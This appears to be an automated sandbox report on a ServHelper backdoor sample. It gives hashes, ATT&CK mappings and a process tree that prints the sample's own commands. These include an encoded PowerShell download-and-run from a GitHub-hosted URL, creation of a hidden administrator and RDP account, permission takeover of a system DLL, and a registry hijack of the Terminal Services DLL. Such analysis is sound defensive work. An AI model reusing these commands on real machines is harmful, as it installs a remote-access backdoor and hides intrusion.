servhelper | 031527224e74b82bf16e639c666134674ecc8a6e648fed2f68255617bd6a3b18

Analysis

max time kernel
130s
max time network
128s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
21-11-2024 20:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
Size

4.6MB
MD5

eaee663dfeb2efcd9ec669f5622858e2
SHA1

2b96f0d568128240d0c53b2a191467fde440fd93
SHA256

6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512

211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
SSDEEP

49152:U8+7QhuKuy4ab57x03AFPd96gUyeBW51fN4AsYfW4sAMnB4jt40bjqkNQU1:U8puFyft

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Servhelper family
servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

Processes:

cmd.exenet.exenet1.execmd.exenet.exenet1.exe

pid	Process
1624	cmd.exe
2040	net.exe
2080	net1.exe
2364	cmd.exe
2456	net.exe
2528	net1.exe

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
5	2756	powershell.exe
6	2756	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

Processes:

cmd.exenet.exenet1.exe

pid	Process
1292	cmd.exe
1716	net.exe
1804	net1.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid	Process
2432	icacls.exe
2192	icacls.exe
1384	icacls.exe
2416	icacls.exe
2420	icacls.exe
1928	icacls.exe
1760	icacls.exe
2088	takeown.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
1908
1908

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid	Process
2432	icacls.exe
2192	icacls.exe
1384	icacls.exe
2416	icacls.exe
2420	icacls.exe
1928	icacls.exe
1760	icacls.exe
2088	takeown.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
4	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral22/files/0x000700000001a4a9-77.dat	upx
behavioral22/files/0x000700000001a4ac-78.dat	upx

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AMK2PH5L0YWHSRRA7LAO.temp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2760	powershell.exe
2168	powershell.exe
1028	powershell.exe
2756	powershell.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
2224	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60ab5e21563cdb01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1904	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2804	powershell.exe
2760	powershell.exe
2168	powershell.exe
1028	powershell.exe
2804	powershell.exe
2804	powershell.exe
2804	powershell.exe
2756	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid	Process
464
1908
1908
1908
1908

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeRestorePrivilege	2192	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2224	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2224	WMIC.exe
Token: SeAuditPrivilege	2224	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2224	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2224	WMIC.exe
Token: SeAuditPrivilege	2224	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2708	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2708	WMIC.exe
Token: SeAuditPrivilege	2708	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2708	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2708	WMIC.exe
Token: SeAuditPrivilege	2708	WMIC.exe
Token: SeDebugPrivilege	2756	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	Process	procid_target
PID 844 wrote to memory of 2804	844	6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe	30
PID 844 wrote to memory of 2804	844	6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe	30
PID 844 wrote to memory of 2804	844	6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe	30
PID 2804 wrote to memory of 2928	2804	powershell.exe	32
PID 2804 wrote to memory of 2928	2804	powershell.exe	32
PID 2804 wrote to memory of 2928	2804	powershell.exe	32
PID 2928 wrote to memory of 2852	2928	csc.exe	33
PID 2928 wrote to memory of 2852	2928	csc.exe	33
PID 2928 wrote to memory of 2852	2928	csc.exe	33
PID 2804 wrote to memory of 2760	2804	powershell.exe	34
PID 2804 wrote to memory of 2760	2804	powershell.exe	34
PID 2804 wrote to memory of 2760	2804	powershell.exe	34
PID 2804 wrote to memory of 2168	2804	powershell.exe	36
PID 2804 wrote to memory of 2168	2804	powershell.exe	36
PID 2804 wrote to memory of 2168	2804	powershell.exe	36
PID 2804 wrote to memory of 1028	2804	powershell.exe	38
PID 2804 wrote to memory of 1028	2804	powershell.exe	38
PID 2804 wrote to memory of 1028	2804	powershell.exe	38
PID 2804 wrote to memory of 2088	2804	powershell.exe	41
PID 2804 wrote to memory of 2088	2804	powershell.exe	41
PID 2804 wrote to memory of 2088	2804	powershell.exe	41
PID 2804 wrote to memory of 2432	2804	powershell.exe	42
PID 2804 wrote to memory of 2432	2804	powershell.exe	42
PID 2804 wrote to memory of 2432	2804	powershell.exe	42
PID 2804 wrote to memory of 2192	2804	powershell.exe	43
PID 2804 wrote to memory of 2192	2804	powershell.exe	43
PID 2804 wrote to memory of 2192	2804	powershell.exe	43
PID 2804 wrote to memory of 1384	2804	powershell.exe	44
PID 2804 wrote to memory of 1384	2804	powershell.exe	44
PID 2804 wrote to memory of 1384	2804	powershell.exe	44
PID 2804 wrote to memory of 2416	2804	powershell.exe	45
PID 2804 wrote to memory of 2416	2804	powershell.exe	45
PID 2804 wrote to memory of 2416	2804	powershell.exe	45
PID 2804 wrote to memory of 2420	2804	powershell.exe	46
PID 2804 wrote to memory of 2420	2804	powershell.exe	46
PID 2804 wrote to memory of 2420	2804	powershell.exe	46
PID 2804 wrote to memory of 1928	2804	powershell.exe	47
PID 2804 wrote to memory of 1928	2804	powershell.exe	47
PID 2804 wrote to memory of 1928	2804	powershell.exe	47
PID 2804 wrote to memory of 1760	2804	powershell.exe	48
PID 2804 wrote to memory of 1760	2804	powershell.exe	48
PID 2804 wrote to memory of 1760	2804	powershell.exe	48
PID 2804 wrote to memory of 2312	2804	powershell.exe	49
PID 2804 wrote to memory of 2312	2804	powershell.exe	49
PID 2804 wrote to memory of 2312	2804	powershell.exe	49
PID 2804 wrote to memory of 1904	2804	powershell.exe	50
PID 2804 wrote to memory of 1904	2804	powershell.exe	50
PID 2804 wrote to memory of 1904	2804	powershell.exe	50
PID 2804 wrote to memory of 2328	2804	powershell.exe	51
PID 2804 wrote to memory of 2328	2804	powershell.exe	51
PID 2804 wrote to memory of 2328	2804	powershell.exe	51
PID 2804 wrote to memory of 1368	2804	powershell.exe	52
PID 2804 wrote to memory of 1368	2804	powershell.exe	52
PID 2804 wrote to memory of 1368	2804	powershell.exe	52
PID 1368 wrote to memory of 2020	1368	net.exe	53
PID 1368 wrote to memory of 2020	1368	net.exe	53
PID 1368 wrote to memory of 2020	1368	net.exe	53
PID 2804 wrote to memory of 976	2804	powershell.exe	54
PID 2804 wrote to memory of 976	2804	powershell.exe	54
PID 2804 wrote to memory of 976	2804	powershell.exe	54
PID 976 wrote to memory of 1136	976	cmd.exe	55
PID 976 wrote to memory of 1136	976	cmd.exe	55
PID 976 wrote to memory of 1136	976	cmd.exe	55
PID 1136 wrote to memory of 2568	1136	cmd.exe	56

C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c7ssiv2k.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2928
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E40.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4E30.tmp"
      4⤵
      PID:2852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1028
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2088
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2432
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2192
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1384
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2416
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2420
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1928
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1760
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2312
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Server Software Component: Terminal Services DLL
    - Modifies registry key
    PID:1904
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2328
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:976
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1136
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:2568
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:904
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2880
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:1724
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:280
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1772
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2228
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:432

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Indicator Removal: Network Share Connection Removal
PID:1292
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  PID:1716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:1804

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 0V2Nxzqz /add
1⤵
PID:1148
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 0V2Nxzqz /add
  2⤵
  PID:1720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 0V2Nxzqz /add
    3⤵
    PID:1512

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1624
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:2040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2080

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" BCXRJFKE$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2364
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" BCXRJFKE$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:2456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" BCXRJFKE$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2528

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1332
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:1912

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 0V2Nxzqz
1⤵
PID:2012
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 0V2Nxzqz
  2⤵
  PID:1692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 0V2Nxzqz
    3⤵
    PID:892

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2508
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2224

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2980
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2708

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2332
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES4E40.tmp

Filesize
1KB

MD5
3844f38478c1fd655116149e52e0dc3d

SHA1
12f7a15c4c7e03bd91aa36e25fec7f2d7c2d9f30

SHA256
10d0a5dd9d07ff4c49d69348cc66d5a85e30551dc9a144ad7676e43cdee6c70f

SHA512
6b97710887187a07a195ce813f2fba1c506dc2664e09a75e4e0c5d56a21555fa6a7362971db3ea7b70685ffca87677b1ddfbfd8cf5c2e64b7357beeee8c774c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\c7ssiv2k.dll

Filesize
3KB

MD5
12551435e75d5c1fd4d052cc6c8e54e0

SHA1
f468601390a262023c7cac49cddb56f6a326a323

SHA256
17db10f1effe51c5b60480a8807b3c1c34fb7109d3eeafdf1e98fc4e965fecaa

SHA512
af976ec92276c4ba87b7c447c10910ecb9c97caf6ad3263c32f126e7b30e981b52df1ad3e59ed8f52acdb1404e89589e72bfe0c3230f4461b5fa0e611f419878

Download Submit
C:\Users\Admin\AppData\Local\Temp\c7ssiv2k.pdb

Filesize
7KB

MD5
33b826dac54184faa01b7091afe7ab5b

SHA1
e635fc1ad68fb5cd4e3ff07c429fb2fda9407c59

SHA256
64747faa11242331fab709cfd3acd53124b1c6e8d3eb9f87e229e051dc8eb8b5

SHA512
e384ab4b7d1a2e51f7c2a83e6d3a881b80bb345e5241e865a3b4bb99e0c91cc1a5bc913e15f950d6229cdc662c3b1dbf01db780eeca50f1843b21efbb95ce587

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
43473f4e719958639a9d89e5d8388999

SHA1
ccb79eb606a23daa4b3ff8f996a2fbf281f31491

SHA256
ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734

SHA512
1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6e1f2b12419b44248556784b9d802c83

SHA1
bff3ca651dc3e197186319a0c125c01fb2a739df

SHA256
4dfed275a536cdb54a9f1790ec0357adcb8874cbbbf6a3bddf7514e88fb3cd6f

SHA512
27348063465ed084bd237ff7640692411c10c4d4d936b055e6db3d5119413fd0aa63a3aa55892d880125d3c2523f51e9b45ab4932c55cec723b8b168a4c4c36a

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC4E30.tmp

Filesize
652B

MD5
cace4db006569045bc845c0e9a33b2d1

SHA1
788c725fbc5f4d6bdc526baee58da3a5e578195f

SHA256
b735247538d7bd8b9c4fe2fedb0cacf92da9377463ddd0fca334d2c16201dde0

SHA512
41125a539232988ad9556066cb47732ca7a3d98382ac68d2502530ff7e6bc8c09bb45013da9f3e2998c500602e02e7da26cb7ec957931ff2cf7f5a41317943de

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\c7ssiv2k.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\c7ssiv2k.cmdline

Filesize
309B

MD5
475da53b18f6749ff83660c6049a136a

SHA1
